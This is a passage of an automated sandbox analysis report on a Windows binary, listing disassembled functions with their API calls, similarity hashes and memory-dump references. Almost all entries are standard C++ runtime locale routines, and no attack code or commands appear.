                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                          • String ID:
                                                                          • API String ID: 459529453-0
                                                                          • Opcode ID: 48e8c346ac2d83787ab06a51c25ef53acc7d283c1d5de5c197a29498b3253f9a
                                                                          • Instruction ID: 457c50a3cdc66de371d710ccee7a1eb86dfb01787c66d7cd752cea09b99b435f
                                                                          • Opcode Fuzzy Hash: 48e8c346ac2d83787ab06a51c25ef53acc7d283c1d5de5c197a29498b3253f9a
                                                                          • Instruction Fuzzy Hash: 54419E71900249DFCB11EF58D940BAEFBB4EF55320F24855AD8566B391DB30AE41CBE1
                                                                          APIs
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00ADEC6D
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00ADEC90
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADECB8
                                                                          • std::_Facet_Register.LIBCPMT ref: 00ADED2D
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADED61
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                          • String ID:
                                                                          • API String ID: 459529453-0
                                                                          • Opcode ID: 6ea9b0ae366413ad77314565aa176c3b9d220fd28faff700aca60415ae4304e3
                                                                          • Instruction ID: d9d726bcdfdf770b67e378a6625baa23d14221ca1d7135b3ca38a6314b938694
                                                                          • Opcode Fuzzy Hash: 6ea9b0ae366413ad77314565aa176c3b9d220fd28faff700aca60415ae4304e3
                                                                          • Instruction Fuzzy Hash: 6541AD71800249DFCB01EF59D944BAEFBB5FF51320F24465AE8626B3A1DB30AE01CB91
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000010,00000010,?,00AD7ACB,?,?,?), ref: 00AD7E47
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                          • API String ID: 1452528299-1782174991
                                                                          • Opcode ID: f7eb425059deb3e13e3ccf30fd4d957fa980f42bea1e2ae9b0e606093aae6c33
                                                                          • Instruction ID: 4126d2994c023c5fbb29419c2aae6ddd126aa464d920f280c4cd30d2bfd226d1
                                                                          • Opcode Fuzzy Hash: f7eb425059deb3e13e3ccf30fd4d957fa980f42bea1e2ae9b0e606093aae6c33
                                                                          • Instruction Fuzzy Hash: 6B211D4AA1026286CB745F3D840037AB3E1AF64755F6518AFECCDD7390FA698D82C395
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Maklocstr$Maklocchr
                                                                          • String ID:
                                                                          • API String ID: 2020259771-0
                                                                          • Opcode ID: d5c7e0049d044de62c1130f961643612f599315adff3fc1795d5c2bbfc386745
                                                                          • Instruction ID: f77889adb08b036b101013ee0758f20e4cd1429f4de8e0b62db10f565ae19339
                                                                          • Opcode Fuzzy Hash: d5c7e0049d044de62c1130f961643612f599315adff3fc1795d5c2bbfc386745
                                                                          • Instruction Fuzzy Hash: 01114CB1908784BBE720DBA6DC81F2AB7ECEF04750F04051AF249CBA41D364F954CBA5
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AE41FA
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AE4204
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • numpunct.LIBCPMT ref: 00AE423E
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AE4255
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE4275
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                          • String ID:
                                                                          • API String ID: 743221004-0
                                                                          • Opcode ID: 56953e5f01dab5b3d5fb6e68dc3477036ec8960bacb4a898ef1bb79fa2713409
                                                                          • Instruction ID: 038bf0319b5fe596ab8fab72f75cfac3991f5f06b7f15a1388f2154a9610afe0
                                                                          • Opcode Fuzzy Hash: 56953e5f01dab5b3d5fb6e68dc3477036ec8960bacb4a898ef1bb79fa2713409
                                                                          • Instruction Fuzzy Hash: BD112B359002568BCF08EBA5CA11BBE77B9BF88314F64440AFA11A7381CF749E00C790
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AE403B
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AE4045
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • codecvt.LIBCPMT ref: 00AE407F
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AE4096
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE40B6
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                          • String ID:
                                                                          • API String ID: 712880209-0
                                                                          • Opcode ID: 7b988f46c4da3ef38539d780d4f121d3023d3e240e955bdbf0a8aa2be88b2a5b
                                                                          • Instruction ID: b6d3db19560798e3c607f1de2dd06017820e400e852def0ccc991b2efb540b55
                                                                          • Opcode Fuzzy Hash: 7b988f46c4da3ef38539d780d4f121d3023d3e240e955bdbf0a8aa2be88b2a5b
                                                                          • Instruction Fuzzy Hash: 9601D6359002599BCB05FBA4DA11BBE77B9AF48320F254409F91167391CF789E00C781
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AF5278
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AF5282
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • messages.LIBCPMT ref: 00AF52BC
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AF52D3
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF52F3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                          • String ID:
                                                                          • API String ID: 2750803064-0
                                                                          • Opcode ID: 1256ba19f50463b4487964f4fd5c94193fea95a4700a30051aed4619f7240dca
                                                                          • Instruction ID: 9f34d0eaf6625f8bb11b8d4cb6b1b8849d9b27b71d8f86b2a0390e818c84ea58
                                                                          • Opcode Fuzzy Hash: 1256ba19f50463b4487964f4fd5c94193fea95a4700a30051aed4619f7240dca
                                                                          • Instruction Fuzzy Hash: 1E019235D0061A9BCB05EBF4D911BBE7BB5AF44320F654509FA11AB391DF749E01CB81
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AF54CC
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AF54D6
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • moneypunct.LIBCPMT ref: 00AF5510
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AF5527
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF5547
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                          • String ID:
                                                                          • API String ID: 419941038-0
                                                                          • Opcode ID: d873bcaeed5eeb3e93548b4d9c9767f146dbf2d6b254a413e1296637dcb07675
                                                                          • Instruction ID: ad90ba0ef64ea189dfff5e540ac575f2820bb86ab43be1a65ad8ee1554e58cb0
                                                                          • Opcode Fuzzy Hash: d873bcaeed5eeb3e93548b4d9c9767f146dbf2d6b254a413e1296637dcb07675
                                                                          • Instruction Fuzzy Hash: 3101D235D00559CBCB09EBA4CA51BBEB7B5AF44320F64440AFA11AB381DF349E00CB80
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AF5437
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AF5441
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • moneypunct.LIBCPMT ref: 00AF547B
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AF5492
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF54B2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                          • String ID:
                                                                          • API String ID: 419941038-0
                                                                          • Opcode ID: adf8baacb1b59848cee0c9b7cc4539a94f617e537e023ccfb16c06156b25d6ae
                                                                          • Instruction ID: eddbb68532dbff206933a190baffd7d9e356dafceb7655af5ecf45fe85881de5
                                                                          • Opcode Fuzzy Hash: adf8baacb1b59848cee0c9b7cc4539a94f617e537e023ccfb16c06156b25d6ae
                                                                          • Instruction Fuzzy Hash: 2C01D235D006199BCB09EBA4D951BBEB7B6AF44321F244409FA11AB3D1DF749E40C7C0
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AEA5FA
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AEA604
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • codecvt.LIBCPMT ref: 00AEA63E
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AEA655
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEA675
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                          • String ID:
                                                                          • API String ID: 712880209-0
                                                                          • Opcode ID: a1a46088e282aee9da986e824929b951840d52b8d131bdbb4ca8bf62e8417732
                                                                          • Instruction ID: 48772dc770110784f05303b280088f9d1af2bd68b8f0983971e870d84acbb185
                                                                          • Opcode Fuzzy Hash: a1a46088e282aee9da986e824929b951840d52b8d131bdbb4ca8bf62e8417732
                                                                          • Instruction Fuzzy Hash: 360149329101598BCB04EB71C922BBE7775BF94324F284409F81167391CF749E00CB81
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AEA565
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AEA56F
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • codecvt.LIBCPMT ref: 00AEA5A9
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AEA5C0
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEA5E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                          • String ID:
                                                                          • API String ID: 712880209-0
                                                                          • Opcode ID: b4d44c3cea69aebf09257397ac1a2c00401a61f5bcfd3020969aa26aa24c8aa0
                                                                          • Instruction ID: 1a20c79af4d234d0dad2956ecdf480a0de1ad62dfc1d274845e45e7bcbafd8a7
                                                                          • Opcode Fuzzy Hash: b4d44c3cea69aebf09257397ac1a2c00401a61f5bcfd3020969aa26aa24c8aa0
                                                                          • Instruction Fuzzy Hash: EB012836900259CBCB05EBA4DA12BBE77B5BF94320F644509F812A7391CF349E04C791
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AEACF6
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AEAD00
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • moneypunct.LIBCPMT ref: 00AEAD3A
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AEAD51
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEAD71
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                          • String ID:
                                                                          • API String ID: 419941038-0
                                                                          • Opcode ID: 6c0d3a1815773c66e6219c5fef6f2581095cfb216a102f224243ee8f3b31303d
                                                                          • Instruction ID: 167a50507dc9eab8cd88562b65351154f1a37cfd2de193512390875388d07f21
                                                                          • Opcode Fuzzy Hash: 6c0d3a1815773c66e6219c5fef6f2581095cfb216a102f224243ee8f3b31303d
                                                                          • Instruction Fuzzy Hash: 7B01453180025A8BCB08EBA4DE52BBE77B9AF94320F240409F814A7391DF349E00C781
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AEAC61
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AEAC6B
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • moneypunct.LIBCPMT ref: 00AEACA5
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AEACBC
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEACDC
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                          • String ID:
                                                                          • API String ID: 419941038-0
                                                                          • Opcode ID: c719debff0cfc6474fd3ac3577f89606f53582ca7cb33d7c4ded10db0da8c314
                                                                          • Instruction ID: 88e9e47b09ecbe310f84ff6e4b4723eacaf2d3edd84e537ed910347914ef211d
                                                                          • Opcode Fuzzy Hash: c719debff0cfc6474fd3ac3577f89606f53582ca7cb33d7c4ded10db0da8c314
                                                                          • Instruction Fuzzy Hash: D001F535900259DBCB05EBA4DA15BBEB7B5BF94320F344409F811AB391CF749E00C792
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AEAD8B
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AEAD95
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • moneypunct.LIBCPMT ref: 00AEADCF
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AEADE6
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEAE06
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                          • String ID:
                                                                          • API String ID: 419941038-0
                                                                          • Opcode ID: bf899d70074d0fc6460756f2708ce99c38cc8133f4649e97a6656c6d33e94305
                                                                          • Instruction ID: 2fbd24146ed31e0a7218fec91554da9b2a44223703c8caaeca66b127c5e8fbd3
                                                                          • Opcode Fuzzy Hash: bf899d70074d0fc6460756f2708ce99c38cc8133f4649e97a6656c6d33e94305
                                                                          • Instruction Fuzzy Hash: F901F53590026A8BCB05EBA5D952BBE77B5BF54320F644409F811A7391CF74AE00CB81
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AEAFDF
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AEAFE9
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • numpunct.LIBCPMT ref: 00AEB023
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AEB03A
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB05A
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                          • String ID:
                                                                          • API String ID: 743221004-0
                                                                          • Opcode ID: 3b26ecf6b5de8bfc8151f40973377fac1455dbffdbddd9aa1fc5115cf50ef789
                                                                          • Instruction ID: d647b919f29bece9cfc542f6e6781f471e1b1a97e17c0b9519dea2042f6d984a
                                                                          • Opcode Fuzzy Hash: 3b26ecf6b5de8bfc8151f40973377fac1455dbffdbddd9aa1fc5115cf50ef789
                                                                          • Instruction Fuzzy Hash: 0801C0369102998FDB15EBA4D915ABFB7B5AF44320F244409E921AB391CF349E01CB90
                                                                          APIs
                                                                          • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00AD61C5
                                                                          • GetLastError.KERNEL32(?,?,?,000000FF,00B1AA0D,000000FF), ref: 00AD627B
                                                                            • Part of subcall function 00AD1FE0: FindResourceW.KERNEL32(00000000,?,00000006,?,00000000,00B1A22D,000000FF,?,80070057,?,00000000,?,00000010,?,00AD1B19,?), ref: 00AD206C
                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,000000FF,00B1AA0D,000000FF), ref: 00AD621F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryErrorFindLastLibraryLoadResourceSystem
                                                                          • String ID: ntdll.dll
                                                                          • API String ID: 4113295189-2227199552
                                                                          • Opcode ID: 109daca6b261627d6f741e58f16064bb97309076581ae73447b3a5c20781181f
                                                                          • Instruction ID: 8bf4078cc7da868fba57556e2cd028fd640cf198afa1cd0ba45e1405050fdae1
                                                                          • Opcode Fuzzy Hash: 109daca6b261627d6f741e58f16064bb97309076581ae73447b3a5c20781181f
                                                                          • Instruction Fuzzy Hash: F6418271A002449BDB10DF68CD85BEEB7B4FF48310F14815AE82AE73C1DB749A04CB51
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AEE084
                                                                            • Part of subcall function 00AE7D8A: _Maklocstr.LIBCPMT ref: 00AE7DAA
                                                                            • Part of subcall function 00AE7D8A: _Maklocstr.LIBCPMT ref: 00AE7DC7
                                                                            • Part of subcall function 00AE7D8A: _Maklocstr.LIBCPMT ref: 00AE7DE4
                                                                            • Part of subcall function 00AE7D8A: _Maklocchr.LIBCPMT ref: 00AE7DF6
                                                                            • Part of subcall function 00AE7D8A: _Maklocchr.LIBCPMT ref: 00AE7E09
                                                                          • _Mpunct.LIBCPMT ref: 00AEE111
                                                                          • _Mpunct.LIBCPMT ref: 00AEE12B
                                                                          Strings
                                                                          Memory Dump Source
